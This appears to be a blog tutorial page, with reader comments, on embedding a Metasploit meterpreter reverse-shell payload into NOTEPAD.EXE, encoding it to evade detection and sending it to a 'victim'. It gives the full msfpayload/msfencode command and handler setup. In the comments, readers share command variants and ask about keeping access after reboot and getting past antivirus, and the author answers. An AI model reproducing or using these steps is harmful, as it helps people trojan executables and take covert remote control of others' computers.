Sorry :(
Our Image server is on a maintenance now,
You will not see the image correctly
please check back shortly. . .
Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps
Type : Tutorial
Level : Beginner, Medium, Advanced
Have you imagine when you click and open your notepad application it contain backdoor or malicious codes? or when you start your windows o.s it also start explorer.exe services, but this explorer.exe containing backdoor or malicious codes? Actually embedding backdoor into EXE files isn't something hard to do, but it's very easy.. you can follow the tutorial below to prove that I'm true it's easy :p LoL 
Requirement :
1. Metasploit Framework 3 (or Metasploit v2)
2. Linux OS(or you can use backtrack 5 that already include metasploit framework inside the Operating System)
Step By Step :
1. First of all you should prepare your target EXE file. In this case I will use NOTEPAD.EXE.
2. Next, we use msfpayload to inject a meterpreter reverse payload into our executable(NOTEPAD.EXE) and encoded it 5 times(5 iterations) using shikata_ga_nai and save the backdoored file into Desktop.
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
3. Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.8.92.
Go to Metasploit console by typing msfconsole, and then run :
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.8.92 LHOST => 192.168.8.92 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit
Don't forget to change LHOST with your own IP address and LPORT with your desired local port.
4. The next step we can send our special NOTEPAD.EXE files to victim, as soon as they download and open it, there's meterpreter shell on victim computer :
PWNED
You also can learn how to implement this method to attack over the internet, but please read my previous tutorial about the logic how to attack network outside LAN / Attack WAN.
Hope it's useful for you. any comment or correction?please drop your comment below
|
|
21 Comments »
RSS feed for comments on this post. TrackBack URL
[...] Creating EXE Backdoor using Metasploit in 4 steps [...]
i cannot make it…my result is look like this
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory – /root/Desktop/NOTEPAD.EXE
[-] No encoders succeeded.
#Tarish
did you already put the original NOTEPAD.EXE in your desktop?
thanks..now its working fine..
Can you explain how to hack a remote pc with metasploit or SET cause i never hack a remote pc although installing a backdoor my backtrack 5 machine wouldnot get any incoming connection from remote machine.i am using vmware workstation..please explain this matter..
waiting for your better tutorial…thanks..
#tarish
I wrote tons of that kind of content on my blog…. Tutorial section
can i open the victim computer again after i shutdown without sending him anything
#mehdi
You can view this tutorial http://vishnuvalentino.com/computer/5-steps-to-set-up-backdoor-after-successfully-compromising-target-using-backtrack-5/
Asswhole, fucking scams!!!!
THIS CONNECTS TO HIS IP!! AND THEN LET'S HIM ACCESS YOUR PC! I AM GONNA SCREW UP YOUR IP!! ASSWHOLE AND THIS SITE IS GOING DOWN!!!
^
above poster is so lame
on the other note, notepad2.exe just dies when i try to open it on victim(test) windows "program stopped working" do you know why?
#tester
maybe he just start learn about computer security 
Yep just ignore it
are you using Windows 7 as your victim? if so, maybe the win 7 DEP and ASLR prevent it from working. you can try in windows xp
[...] http://vishnuvalentino.com/computer/create-exe-backdoor-using-metasploit-and-backtrack-5-in-4-simple… [...]
hey i managed to exploit my xp computer! i want to try it on Win7 computer (x64)… is it possible? any help any idea plzz
#alpha
I haven’t try it on Win7 x64, but maybe it has different infrastructure with x86…
hey thanx for a quick reply!
have done it on win 7 32 bit (x86)? does it work on it or does it simply refuses to work on win7? what do you think about vista?
#alpha
No it can’t on Windows 7, it has DEP to prevent exploit execution..it works on Windows XP
i realized that session dies after victim closes our backdoor file in this case Notepad,
and victim's AV Norton360 shows an alert that this file is not safe to run,
any ways to solve those problems ?
and i couldnt use your provided code i'm facing no encoder found and blah blah errors with that
i use this which i found on some blogs:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=5610 R | /pentest/exploits/framework3/msfencode -t exe -x /root/Desktop/notepad.exe -k -o /root/Desktop/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
Any Guids ? solutions ?
oh i forget, thanks in advance
Awesome blog and articles mate , keep it up
When the exploit is ran it displays “Handler failed to bind to (ip address)”. Why is that?
-DeusIgni
Also, when flashdrive containing NOTEPAD2.EXE is opened on target, the system deletes it due to the fact that is has been found as a trojan virus. Is there anyway possible to overcome this without turning off the antivirus or having the target download the file? -DeusIgni
#Deuslgni
Yep that’s true it’s detected by antivirus…but my purpose here was the logic about how to create a backdoor…
Which was very astute tutorial, thank you for that.
-DeusIgni